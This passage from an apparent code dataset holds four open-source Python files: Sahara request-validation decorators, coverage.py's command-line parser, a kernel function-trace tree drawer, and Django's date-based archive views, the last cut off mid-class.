repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
esikachev/scenario
sahara/service/validation.py
10
2522
# Copyright (c) 2013 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import functools import jsonschema from sahara import exceptions as ex from sahara.i18n import _ from sahara.utils import api as u from sahara.utils import api_validator def validate(schema, *validators): def decorator(func): @functools.wraps(func) def handler(*args, **kwargs): request_data = u.request_data() try: if schema: validator = api_validator.ApiValidator(schema) validator.validate(request_data) if validators: for validator in validators: validator(**kwargs) except jsonschema.ValidationError as e: e.code = "VALIDATION_ERROR" return u.bad_request(e) except ex.SaharaException as e: return u.bad_request(e) except Exception as e: return u.internal_error( 500, "Error occurred during validation", e) return func(*args, **kwargs) return handler return decorator def check_exists(get_func, *id_prop, **get_args): def decorator(func): @functools.wraps(func) def handler(*args, **kwargs): if id_prop and not get_args: get_args['id'] = id_prop[0] get_kwargs = {} for get_arg in get_args: get_kwargs[get_arg] = kwargs[get_args[get_arg]] obj = None try: obj = get_func(**get_kwargs) except Exception as e: if 'notfound' not in e.__class__.__name__.lower(): raise e if obj is None: e = ex.NotFoundException(get_kwargs, _('Object with %s not found')) return u.not_found(e) return func(*args, **kwargs) return handler return decorator
apache-2.0
primiano/depot_tools
third_party/coverage/cmdline.py
49
25011
"""Command-line support for Coverage.""" import optparse, os, sys, traceback from coverage.backward import sorted # pylint: disable=W0622 from coverage.execfile import run_python_file, run_python_module from coverage.misc import CoverageException, ExceptionDuringRun, NoSource from coverage.debug import info_formatter class Opts(object): """A namespace class for individual options we'll build parsers from.""" append = optparse.make_option( '-a', '--append', action='store_false', dest="erase_first", help="Append coverage data to .coverage, otherwise it is started " "clean with each run." ) branch = optparse.make_option( '', '--branch', action='store_true', help="Measure branch coverage in addition to statement coverage." ) debug = optparse.make_option( '', '--debug', action='store', metavar="OPTS", help="Debug options, separated by commas" ) directory = optparse.make_option( '-d', '--directory', action='store', metavar="DIR", help="Write the output files to DIR." ) fail_under = optparse.make_option( '', '--fail-under', action='store', metavar="MIN", type="int", help="Exit with a status of 2 if the total coverage is less than MIN." ) help = optparse.make_option( '-h', '--help', action='store_true', help="Get help on this command." ) ignore_errors = optparse.make_option( '-i', '--ignore-errors', action='store_true', help="Ignore errors while reading source files." ) include = optparse.make_option( '', '--include', action='store', metavar="PAT1,PAT2,...", help="Include files only when their filename path matches one of " "these patterns. Usually needs quoting on the command line." ) pylib = optparse.make_option( '-L', '--pylib', action='store_true', help="Measure coverage even inside the Python installed library, " "which isn't done by default." ) show_missing = optparse.make_option( '-m', '--show-missing', action='store_true', help="Show line numbers of statements in each module that weren't " "executed." ) old_omit = optparse.make_option( '-o', '--omit', action='store', metavar="PAT1,PAT2,...", help="Omit files when their filename matches one of these patterns. " "Usually needs quoting on the command line." ) omit = optparse.make_option( '', '--omit', action='store', metavar="PAT1,PAT2,...", help="Omit files when their filename matches one of these patterns. " "Usually needs quoting on the command line." ) output_xml = optparse.make_option( '-o', '', action='store', dest="outfile", metavar="OUTFILE", help="Write the XML report to this file. Defaults to 'coverage.xml'" ) parallel_mode = optparse.make_option( '-p', '--parallel-mode', action='store_true', help="Append the machine name, process id and random number to the " ".coverage data file name to simplify collecting data from " "many processes." ) module = optparse.make_option( '-m', '--module', action='store_true', help="<pyfile> is an importable Python module, not a script path, " "to be run as 'python -m' would run it." ) rcfile = optparse.make_option( '', '--rcfile', action='store', help="Specify configuration file. Defaults to '.coveragerc'" ) source = optparse.make_option( '', '--source', action='store', metavar="SRC1,SRC2,...", help="A list of packages or directories of code to be measured." ) timid = optparse.make_option( '', '--timid', action='store_true', help="Use a simpler but slower trace method. Try this if you get " "seemingly impossible results!" ) title = optparse.make_option( '', '--title', action='store', metavar="TITLE", help="A text string to use as the title on the HTML." ) version = optparse.make_option( '', '--version', action='store_true', help="Display version information and exit." ) class CoverageOptionParser(optparse.OptionParser, object): """Base OptionParser for coverage. Problems don't exit the program. Defaults are initialized for all options. """ def __init__(self, *args, **kwargs): super(CoverageOptionParser, self).__init__( add_help_option=False, *args, **kwargs ) self.set_defaults( actions=[], branch=None, debug=None, directory=None, fail_under=None, help=None, ignore_errors=None, include=None, omit=None, parallel_mode=None, module=None, pylib=None, rcfile=True, show_missing=None, source=None, timid=None, title=None, erase_first=None, version=None, ) self.disable_interspersed_args() self.help_fn = self.help_noop def help_noop(self, error=None, topic=None, parser=None): """No-op help function.""" pass class OptionParserError(Exception): """Used to stop the optparse error handler ending the process.""" pass def parse_args(self, args=None, options=None): """Call optparse.parse_args, but return a triple: (ok, options, args) """ try: options, args = \ super(CoverageOptionParser, self).parse_args(args, options) except self.OptionParserError: return False, None, None return True, options, args def error(self, msg): """Override optparse.error so sys.exit doesn't get called.""" self.help_fn(msg) raise self.OptionParserError class ClassicOptionParser(CoverageOptionParser): """Command-line parser for coverage.py classic arguments.""" def __init__(self): super(ClassicOptionParser, self).__init__() self.add_action('-a', '--annotate', 'annotate') self.add_action('-b', '--html', 'html') self.add_action('-c', '--combine', 'combine') self.add_action('-e', '--erase', 'erase') self.add_action('-r', '--report', 'report') self.add_action('-x', '--execute', 'execute') self.add_options([ Opts.directory, Opts.help, Opts.ignore_errors, Opts.pylib, Opts.show_missing, Opts.old_omit, Opts.parallel_mode, Opts.timid, Opts.version, ]) def add_action(self, dash, dashdash, action_code): """Add a specialized option that is the action to execute.""" option = self.add_option(dash, dashdash, action='callback', callback=self._append_action ) option.action_code = action_code def _append_action(self, option, opt_unused, value_unused, parser): """Callback for an option that adds to the `actions` list.""" parser.values.actions.append(option.action_code) class CmdOptionParser(CoverageOptionParser): """Parse one of the new-style commands for coverage.py.""" def __init__(self, action, options=None, defaults=None, usage=None, cmd=None, description=None ): """Create an OptionParser for a coverage command. `action` is the slug to put into `options.actions`. `options` is a list of Option's for the command. `defaults` is a dict of default value for options. `usage` is the usage string to display in help. `cmd` is the command name, if different than `action`. `description` is the description of the command, for the help text. """ if usage: usage = "%prog " + usage super(CmdOptionParser, self).__init__( prog="coverage %s" % (cmd or action), usage=usage, description=description, ) self.set_defaults(actions=[action], **(defaults or {})) if options: self.add_options(options) self.cmd = cmd or action def __eq__(self, other): # A convenience equality, so that I can put strings in unit test # results, and they will compare equal to objects. return (other == "<CmdOptionParser:%s>" % self.cmd) GLOBAL_ARGS = [ Opts.rcfile, Opts.help, ] CMDS = { 'annotate': CmdOptionParser("annotate", [ Opts.directory, Opts.ignore_errors, Opts.omit, Opts.include, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Make annotated copies of the given files, marking " "statements that are executed with > and statements that are " "missed with !." ), 'combine': CmdOptionParser("combine", GLOBAL_ARGS, usage = " ", description = "Combine data from multiple coverage files collected " "with 'run -p'. The combined results are written to a single " "file representing the union of the data." ), 'debug': CmdOptionParser("debug", GLOBAL_ARGS, usage = "<topic>", description = "Display information on the internals of coverage.py, " "for diagnosing problems. " "Topics are 'data' to show a summary of the collected data, " "or 'sys' to show installation information." ), 'erase': CmdOptionParser("erase", GLOBAL_ARGS, usage = " ", description = "Erase previously collected coverage data." ), 'help': CmdOptionParser("help", GLOBAL_ARGS, usage = "[command]", description = "Describe how to use coverage.py" ), 'html': CmdOptionParser("html", [ Opts.directory, Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.title, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Create an HTML report of the coverage of the files. " "Each file gets its own page, with the source decorated to show " "executed, excluded, and missed lines." ), 'report': CmdOptionParser("report", [ Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.show_missing, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Report coverage statistics on modules." ), 'run': CmdOptionParser("execute", [ Opts.append, Opts.branch, Opts.debug, Opts.pylib, Opts.parallel_mode, Opts.module, Opts.timid, Opts.source, Opts.omit, Opts.include, ] + GLOBAL_ARGS, defaults = {'erase_first': True}, cmd = "run", usage = "[options] <pyfile> [program options]", description = "Run a Python program, measuring code execution." ), 'xml': CmdOptionParser("xml", [ Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.output_xml, ] + GLOBAL_ARGS, cmd = "xml", usage = "[options] [modules]", description = "Generate an XML report of coverage results." ), } OK, ERR, FAIL_UNDER = 0, 1, 2 class CoverageScript(object): """The command-line interface to Coverage.""" def __init__(self, _covpkg=None, _run_python_file=None, _run_python_module=None, _help_fn=None): # _covpkg is for dependency injection, so we can test this code. if _covpkg: self.covpkg = _covpkg else: import coverage self.covpkg = coverage # For dependency injection: self.run_python_file = _run_python_file or run_python_file self.run_python_module = _run_python_module or run_python_module self.help_fn = _help_fn or self.help self.classic = False self.coverage = None def command_line(self, argv): """The bulk of the command line interface to Coverage. `argv` is the argument list to process. Returns 0 if all is well, 1 if something went wrong. """ # Collect the command-line options. if not argv: self.help_fn(topic='minimum_help') return OK # The command syntax we parse depends on the first argument. Classic # syntax always starts with an option. self.classic = argv[0].startswith('-') if self.classic: parser = ClassicOptionParser() else: parser = CMDS.get(argv[0]) if not parser: self.help_fn("Unknown command: '%s'" % argv[0]) return ERR argv = argv[1:] parser.help_fn = self.help_fn ok, options, args = parser.parse_args(argv) if not ok: return ERR # Handle help and version. if self.do_help(options, args, parser): return OK # Check for conflicts and problems in the options. if not self.args_ok(options, args): return ERR # Listify the list options. source = unshell_list(options.source) omit = unshell_list(options.omit) include = unshell_list(options.include) debug = unshell_list(options.debug) # Do something. self.coverage = self.covpkg.coverage( data_suffix = options.parallel_mode, cover_pylib = options.pylib, timid = options.timid, branch = options.branch, config_file = options.rcfile, source = source, omit = omit, include = include, debug = debug, ) if 'debug' in options.actions: return self.do_debug(args) if 'erase' in options.actions or options.erase_first: self.coverage.erase() else: self.coverage.load() if 'execute' in options.actions: self.do_execute(options, args) if 'combine' in options.actions: self.coverage.combine() self.coverage.save() # Remaining actions are reporting, with some common options. report_args = dict( morfs = args, ignore_errors = options.ignore_errors, omit = omit, include = include, ) if 'report' in options.actions: total = self.coverage.report( show_missing=options.show_missing, **report_args) if 'annotate' in options.actions: self.coverage.annotate( directory=options.directory, **report_args) if 'html' in options.actions: total = self.coverage.html_report( directory=options.directory, title=options.title, **report_args) if 'xml' in options.actions: outfile = options.outfile total = self.coverage.xml_report(outfile=outfile, **report_args) if options.fail_under is not None: if total >= options.fail_under: return OK else: return FAIL_UNDER else: return OK def help(self, error=None, topic=None, parser=None): """Display an error message, or the named topic.""" assert error or topic or parser if error: print(error) print("Use 'coverage help' for help.") elif parser: print(parser.format_help().strip()) else: help_msg = HELP_TOPICS.get(topic, '').strip() if help_msg: print(help_msg % self.covpkg.__dict__) else: print("Don't know topic %r" % topic) def do_help(self, options, args, parser): """Deal with help requests. Return True if it handled the request, False if not. """ # Handle help. if options.help: if self.classic: self.help_fn(topic='help') else: self.help_fn(parser=parser) return True if "help" in options.actions: if args: for a in args: parser = CMDS.get(a) if parser: self.help_fn(parser=parser) else: self.help_fn(topic=a) else: self.help_fn(topic='help') return True # Handle version. if options.version: self.help_fn(topic='version') return True return False def args_ok(self, options, args): """Check for conflicts and problems in the options. Returns True if everything is ok, or False if not. """ for i in ['erase', 'execute']: for j in ['annotate', 'html', 'report', 'combine']: if (i in options.actions) and (j in options.actions): self.help_fn("You can't specify the '%s' and '%s' " "options at the same time." % (i, j)) return False if not options.actions: self.help_fn( "You must specify at least one of -e, -x, -c, -r, -a, or -b." ) return False args_allowed = ( 'execute' in options.actions or 'annotate' in options.actions or 'html' in options.actions or 'debug' in options.actions or 'report' in options.actions or 'xml' in options.actions ) if not args_allowed and args: self.help_fn("Unexpected arguments: %s" % " ".join(args)) return False if 'execute' in options.actions and not args: self.help_fn("Nothing to do.") return False return True def do_execute(self, options, args): """Implementation of 'coverage run'.""" # Set the first path element properly. old_path0 = sys.path[0] # Run the script. self.coverage.start() code_ran = True try: try: if options.module: sys.path[0] = '' self.run_python_module(args[0], args) else: filename = args[0] sys.path[0] = os.path.abspath(os.path.dirname(filename)) self.run_python_file(filename, args) except NoSource: code_ran = False raise finally: self.coverage.stop() if code_ran: self.coverage.save() # Restore the old path sys.path[0] = old_path0 def do_debug(self, args): """Implementation of 'coverage debug'.""" if not args: self.help_fn("What information would you like: data, sys?") return ERR for info in args: if info == 'sys': print("-- sys ----------------------------------------") for line in info_formatter(self.coverage.sysinfo()): print(" %s" % line) elif info == 'data': print("-- data ---------------------------------------") self.coverage.load() print("path: %s" % self.coverage.data.filename) print("has_arcs: %r" % self.coverage.data.has_arcs()) summary = self.coverage.data.summary(fullpath=True) if summary: filenames = sorted(summary.keys()) print("\n%d files:" % len(filenames)) for f in filenames: print("%s: %d lines" % (f, summary[f])) else: print("No data collected") else: self.help_fn("Don't know what you mean by %r" % info) return ERR return OK def unshell_list(s): """Turn a command-line argument into a list.""" if not s: return None if sys.platform == 'win32': # When running coverage as coverage.exe, some of the behavior # of the shell is emulated: wildcards are expanded into a list of # filenames. So you have to single-quote patterns on the command # line, but (not) helpfully, the single quotes are included in the # argument, so we have to strip them off here. s = s.strip("'") return s.split(',') HELP_TOPICS = { # ------------------------- 'classic': r"""Coverage.py version %(__version__)s Measure, collect, and report on code coverage in Python programs. Usage: coverage -x [-p] [-L] [--timid] MODULE.py [ARG1 ARG2 ...] Execute the module, passing the given command-line arguments, collecting coverage data. With the -p option, include the machine name and process id in the .coverage file name. With -L, measure coverage even inside the Python installed library, which isn't done by default. With --timid, use a simpler but slower trace method. coverage -e Erase collected coverage data. coverage -c Combine data from multiple coverage files (as created by -p option above) and store it into a single file representing the union of the coverage. coverage -r [-m] [-i] [-o DIR,...] [FILE1 FILE2 ...] Report on the statement coverage for the given files. With the -m option, show line numbers of the statements that weren't executed. coverage -b -d DIR [-i] [-o DIR,...] [FILE1 FILE2 ...] Create an HTML report of the coverage of the given files. Each file gets its own page, with the file listing decorated to show executed, excluded, and missed lines. coverage -a [-d DIR] [-i] [-o DIR,...] [FILE1 FILE2 ...] Make annotated copies of the given files, marking statements that are executed with > and statements that are missed with !. -d DIR Write output files for -b or -a to this directory. -i Ignore errors while reporting or annotating. -o DIR,... Omit reporting or annotating files when their filename path starts with a directory listed in the omit list. e.g. coverage -i -r -o c:\python25,lib\enthought\traits Coverage data is saved in the file .coverage by default. Set the COVERAGE_FILE environment variable to save it somewhere else. """, # ------------------------- 'help': """\ Coverage.py, version %(__version__)s Measure, collect, and report on code coverage in Python programs. usage: coverage <command> [options] [args] Commands: annotate Annotate source files with execution information. combine Combine a number of data files. erase Erase previously collected coverage data. help Get help on using coverage.py. html Create an HTML report. report Report coverage stats on modules. run Run a Python program and measure code execution. xml Create an XML report of coverage results. Use "coverage help <command>" for detailed help on any command. Use "coverage help classic" for help on older command syntax. For more information, see %(__url__)s """, # ------------------------- 'minimum_help': """\ Code coverage for Python. Use 'coverage help' for help. """, # ------------------------- 'version': """\ Coverage.py, version %(__version__)s. %(__url__)s """, } def main(argv=None): """The main entry point to Coverage. This is installed as the script entry point. """ if argv is None: argv = sys.argv[1:] try: status = CoverageScript().command_line(argv) except ExceptionDuringRun: # An exception was caught while running the product code. The # sys.exc_info() return tuple is packed into an ExceptionDuringRun # exception. _, err, _ = sys.exc_info() traceback.print_exception(*err.args) status = ERR except CoverageException: # A controlled error inside coverage.py: print the message to the user. _, err, _ = sys.exc_info() print(err) status = ERR except SystemExit: # The user called `sys.exit()`. Exit with their argument, if any. _, err, _ = sys.exc_info() if err.args: status = err.args[0] else: status = None return status
bsd-3-clause
mrg666/android_kernel_icon
scripts/tracing/draw_functrace.py
14676
3560
#!/usr/bin/python """ Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com> Licensed under the terms of the GNU GPL License version 2 This script parses a trace provided by the function tracer in kernel/trace/trace_functions.c The resulted trace is processed into a tree to produce a more human view of the call stack by drawing textual but hierarchical tree of calls. Only the functions's names and the the call time are provided. Usage: Be sure that you have CONFIG_FUNCTION_TRACER # mount -t debugfs nodev /sys/kernel/debug # echo function > /sys/kernel/debug/tracing/current_tracer $ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func Wait some times but not too much, the script is a bit slow. Break the pipe (Ctrl + Z) $ scripts/draw_functrace.py < raw_trace_func > draw_functrace Then you have your drawn trace in draw_functrace """ import sys, re class CallTree: """ This class provides a tree representation of the functions call stack. If a function has no parent in the kernel (interrupt, syscall, kernel thread...) then it is attached to a virtual parent called ROOT. """ ROOT = None def __init__(self, func, time = None, parent = None): self._func = func self._time = time if parent is None: self._parent = CallTree.ROOT else: self._parent = parent self._children = [] def calls(self, func, calltime): """ If a function calls another one, call this method to insert it into the tree at the appropriate place. @return: A reference to the newly created child node. """ child = CallTree(func, calltime, self) self._children.append(child) return child def getParent(self, func): """ Retrieve the last parent of the current node that has the name given by func. If this function is not on a parent, then create it as new child of root @return: A reference to the parent. """ tree = self while tree != CallTree.ROOT and tree._func != func: tree = tree._parent if tree == CallTree.ROOT: child = CallTree.ROOT.calls(func, None) return child return tree def __repr__(self): return self.__toString("", True) def __toString(self, branch, lastChild): if self._time is not None: s = "%s----%s (%s)\n" % (branch, self._func, self._time) else: s = "%s----%s\n" % (branch, self._func) i = 0 if lastChild: branch = branch[:-1] + " " while i < len(self._children): if i != len(self._children) - 1: s += "%s" % self._children[i].__toString(branch +\ " |", False) else: s += "%s" % self._children[i].__toString(branch +\ " |", True) i += 1 return s class BrokenLineException(Exception): """If the last line is not complete because of the pipe breakage, we want to stop the processing and ignore this line. """ pass class CommentLineException(Exception): """ If the line is a comment (as in the beginning of the trace file), just ignore it. """ pass def parseLine(line): line = line.strip() if line.startswith("#"): raise CommentLineException m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line) if m is None: raise BrokenLineException return (m.group(1), m.group(2), m.group(3)) def main(): CallTree.ROOT = CallTree("Root (Nowhere)", None, None) tree = CallTree.ROOT for line in sys.stdin: try: calltime, callee, caller = parseLine(line) except BrokenLineException: break except CommentLineException: continue tree = tree.getParent(caller) tree = tree.calls(callee, calltime) print CallTree.ROOT if __name__ == "__main__": main()
gpl-2.0
jhg/django
django/views/generic/dates.py
251
25791
from __future__ import unicode_literals import datetime from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.db import models from django.http import Http404 from django.utils import timezone from django.utils.encoding import force_str, force_text from django.utils.functional import cached_property from django.utils.translation import ugettext as _ from django.views.generic.base import View from django.views.generic.detail import ( BaseDetailView, SingleObjectTemplateResponseMixin, ) from django.views.generic.list import ( MultipleObjectMixin, MultipleObjectTemplateResponseMixin, ) class YearMixin(object): """ Mixin for views manipulating year-based data. """ year_format = '%Y' year = None def get_year_format(self): """ Get a year format string in strptime syntax to be used to parse the year from url variables. """ return self.year_format def get_year(self): """ Return the year for which this view should display data. """ year = self.year if year is None: try: year = self.kwargs['year'] except KeyError: try: year = self.request.GET['year'] except KeyError: raise Http404(_("No year specified")) return year def get_next_year(self, date): """ Get the next valid year. """ return _get_next_prev(self, date, is_previous=False, period='year') def get_previous_year(self, date): """ Get the previous valid year. """ return _get_next_prev(self, date, is_previous=True, period='year') def _get_next_year(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date.replace(year=date.year + 1, month=1, day=1) def _get_current_year(self, date): """ Return the start date of the current interval. """ return date.replace(month=1, day=1) class MonthMixin(object): """ Mixin for views manipulating month-based data. """ month_format = '%b' month = None def get_month_format(self): """ Get a month format string in strptime syntax to be used to parse the month from url variables. """ return self.month_format def get_month(self): """ Return the month for which this view should display data. """ month = self.month if month is None: try: month = self.kwargs['month'] except KeyError: try: month = self.request.GET['month'] except KeyError: raise Http404(_("No month specified")) return month def get_next_month(self, date): """ Get the next valid month. """ return _get_next_prev(self, date, is_previous=False, period='month') def get_previous_month(self, date): """ Get the previous valid month. """ return _get_next_prev(self, date, is_previous=True, period='month') def _get_next_month(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ if date.month == 12: return date.replace(year=date.year + 1, month=1, day=1) else: return date.replace(month=date.month + 1, day=1) def _get_current_month(self, date): """ Return the start date of the previous interval. """ return date.replace(day=1) class DayMixin(object): """ Mixin for views manipulating day-based data. """ day_format = '%d' day = None def get_day_format(self): """ Get a day format string in strptime syntax to be used to parse the day from url variables. """ return self.day_format def get_day(self): """ Return the day for which this view should display data. """ day = self.day if day is None: try: day = self.kwargs['day'] except KeyError: try: day = self.request.GET['day'] except KeyError: raise Http404(_("No day specified")) return day def get_next_day(self, date): """ Get the next valid day. """ return _get_next_prev(self, date, is_previous=False, period='day') def get_previous_day(self, date): """ Get the previous valid day. """ return _get_next_prev(self, date, is_previous=True, period='day') def _get_next_day(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date + datetime.timedelta(days=1) def _get_current_day(self, date): """ Return the start date of the current interval. """ return date class WeekMixin(object): """ Mixin for views manipulating week-based data. """ week_format = '%U' week = None def get_week_format(self): """ Get a week format string in strptime syntax to be used to parse the week from url variables. """ return self.week_format def get_week(self): """ Return the week for which this view should display data """ week = self.week if week is None: try: week = self.kwargs['week'] except KeyError: try: week = self.request.GET['week'] except KeyError: raise Http404(_("No week specified")) return week def get_next_week(self, date): """ Get the next valid week. """ return _get_next_prev(self, date, is_previous=False, period='week') def get_previous_week(self, date): """ Get the previous valid week. """ return _get_next_prev(self, date, is_previous=True, period='week') def _get_next_week(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date + datetime.timedelta(days=7 - self._get_weekday(date)) def _get_current_week(self, date): """ Return the start date of the current interval. """ return date - datetime.timedelta(self._get_weekday(date)) def _get_weekday(self, date): """ Return the weekday for a given date. The first day according to the week format is 0 and the last day is 6. """ week_format = self.get_week_format() if week_format == '%W': # week starts on Monday return date.weekday() elif week_format == '%U': # week starts on Sunday return (date.weekday() + 1) % 7 else: raise ValueError("unknown week format: %s" % week_format) class DateMixin(object): """ Mixin class for views manipulating date-based data. """ date_field = None allow_future = False def get_date_field(self): """ Get the name of the date field to be used to filter by. """ if self.date_field is None: raise ImproperlyConfigured("%s.date_field is required." % self.__class__.__name__) return self.date_field def get_allow_future(self): """ Returns `True` if the view should be allowed to display objects from the future. """ return self.allow_future # Note: the following three methods only work in subclasses that also # inherit SingleObjectMixin or MultipleObjectMixin. @cached_property def uses_datetime_field(self): """ Return `True` if the date field is a `DateTimeField` and `False` if it's a `DateField`. """ model = self.get_queryset().model if self.model is None else self.model field = model._meta.get_field(self.get_date_field()) return isinstance(field, models.DateTimeField) def _make_date_lookup_arg(self, value): """ Convert a date into a datetime when the date field is a DateTimeField. When time zone support is enabled, `date` is assumed to be in the current time zone, so that displayed items are consistent with the URL. """ if self.uses_datetime_field: value = datetime.datetime.combine(value, datetime.time.min) if settings.USE_TZ: value = timezone.make_aware(value, timezone.get_current_timezone()) return value def _make_single_date_lookup(self, date): """ Get the lookup kwargs for filtering on a single date. If the date field is a DateTimeField, we can't just filter on date_field=date because that doesn't take the time into account. """ date_field = self.get_date_field() if self.uses_datetime_field: since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(date + datetime.timedelta(days=1)) return { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } else: # Skip self._make_date_lookup_arg, it's a no-op in this branch. return {date_field: date} class BaseDateListView(MultipleObjectMixin, DateMixin, View): """ Abstract base class for date-based views displaying a list of objects. """ allow_empty = False date_list_period = 'year' def get(self, request, *args, **kwargs): self.date_list, self.object_list, extra_context = self.get_dated_items() context = self.get_context_data(object_list=self.object_list, date_list=self.date_list) context.update(extra_context) return self.render_to_response(context) def get_dated_items(self): """ Obtain the list of dates and items. """ raise NotImplementedError('A DateView must provide an implementation of get_dated_items()') def get_ordering(self): """ Returns the field or fields to use for ordering the queryset; uses the date field by default. """ return '-%s' % self.get_date_field() if self.ordering is None else self.ordering def get_dated_queryset(self, **lookup): """ Get a queryset properly filtered according to `allow_future` and any extra lookup kwargs. """ qs = self.get_queryset().filter(**lookup) date_field = self.get_date_field() allow_future = self.get_allow_future() allow_empty = self.get_allow_empty() paginate_by = self.get_paginate_by(qs) if not allow_future: now = timezone.now() if self.uses_datetime_field else timezone_today() qs = qs.filter(**{'%s__lte' % date_field: now}) if not allow_empty: # When pagination is enabled, it's better to do a cheap query # than to load the unpaginated queryset in memory. is_empty = len(qs) == 0 if paginate_by is None else not qs.exists() if is_empty: raise Http404(_("No %(verbose_name_plural)s available") % { 'verbose_name_plural': force_text(qs.model._meta.verbose_name_plural) }) return qs def get_date_list_period(self): """ Get the aggregation period for the list of dates: 'year', 'month', or 'day'. """ return self.date_list_period def get_date_list(self, queryset, date_type=None, ordering='ASC'): """ Get a date list by calling `queryset.dates/datetimes()`, checking along the way for empty lists that aren't allowed. """ date_field = self.get_date_field() allow_empty = self.get_allow_empty() if date_type is None: date_type = self.get_date_list_period() if self.uses_datetime_field: date_list = queryset.datetimes(date_field, date_type, ordering) else: date_list = queryset.dates(date_field, date_type, ordering) if date_list is not None and not date_list and not allow_empty: name = force_text(queryset.model._meta.verbose_name_plural) raise Http404(_("No %(verbose_name_plural)s available") % {'verbose_name_plural': name}) return date_list class BaseArchiveIndexView(BaseDateListView): """ Base class for archives of date-based items. Requires a response mixin. """ context_object_name = 'latest' def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ qs = self.get_dated_queryset() date_list = self.get_date_list(qs, ordering='DESC') if not date_list: qs = qs.none() return (date_list, qs, {}) class ArchiveIndexView(MultipleObjectTemplateResponseMixin, BaseArchiveIndexView): """ Top-level archive of date-based items. """ template_name_suffix = '_archive' class BaseYearArchiveView(YearMixin, BaseDateListView): """ List of objects published in a given year. """ date_list_period = 'month' make_object_list = False def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() date_field = self.get_date_field() date = _date_from_string(year, self.get_year_format()) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_year(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) date_list = self.get_date_list(qs) if not self.get_make_object_list(): # We need this to be a queryset since parent classes introspect it # to find information about the model. qs = qs.none() return (date_list, qs, { 'year': date, 'next_year': self.get_next_year(date), 'previous_year': self.get_previous_year(date), }) def get_make_object_list(self): """ Return `True` if this view should contain the full list of objects in the given year. """ return self.make_object_list class YearArchiveView(MultipleObjectTemplateResponseMixin, BaseYearArchiveView): """ List of objects published in a given year. """ template_name_suffix = '_archive_year' class BaseMonthArchiveView(YearMixin, MonthMixin, BaseDateListView): """ List of objects published in a given month. """ date_list_period = 'day' def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() month = self.get_month() date_field = self.get_date_field() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format()) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_month(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) date_list = self.get_date_list(qs) return (date_list, qs, { 'month': date, 'next_month': self.get_next_month(date), 'previous_month': self.get_previous_month(date), }) class MonthArchiveView(MultipleObjectTemplateResponseMixin, BaseMonthArchiveView): """ List of objects published in a given month. """ template_name_suffix = '_archive_month' class BaseWeekArchiveView(YearMixin, WeekMixin, BaseDateListView): """ List of objects published in a given week. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() week = self.get_week() date_field = self.get_date_field() week_format = self.get_week_format() week_start = { '%W': '1', '%U': '0', }[week_format] date = _date_from_string(year, self.get_year_format(), week_start, '%w', week, week_format) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_week(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) return (None, qs, { 'week': date, 'next_week': self.get_next_week(date), 'previous_week': self.get_previous_week(date), }) class WeekArchiveView(MultipleObjectTemplateResponseMixin, BaseWeekArchiveView): """ List of objects published in a given week. """ template_name_suffix = '_archive_week' class BaseDayArchiveView(YearMixin, MonthMixin, DayMixin, BaseDateListView): """ List of objects published on a given day. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() month = self.get_month() day = self.get_day() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format(), day, self.get_day_format()) return self._get_dated_items(date) def _get_dated_items(self, date): """ Do the actual heavy lifting of getting the dated items; this accepts a date object so that TodayArchiveView can be trivial. """ lookup_kwargs = self._make_single_date_lookup(date) qs = self.get_dated_queryset(**lookup_kwargs) return (None, qs, { 'day': date, 'previous_day': self.get_previous_day(date), 'next_day': self.get_next_day(date), 'previous_month': self.get_previous_month(date), 'next_month': self.get_next_month(date) }) class DayArchiveView(MultipleObjectTemplateResponseMixin, BaseDayArchiveView): """ List of objects published on a given day. """ template_name_suffix = "_archive_day" class BaseTodayArchiveView(BaseDayArchiveView): """ List of objects published today. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ return self._get_dated_items(datetime.date.today()) class TodayArchiveView(MultipleObjectTemplateResponseMixin, BaseTodayArchiveView): """ List of objects published today. """ template_name_suffix = "_archive_day" class BaseDateDetailView(YearMixin, MonthMixin, DayMixin, DateMixin, BaseDetailView): """ Detail view of a single object on a single date; this differs from the standard DetailView by accepting a year/month/day in the URL. """ def 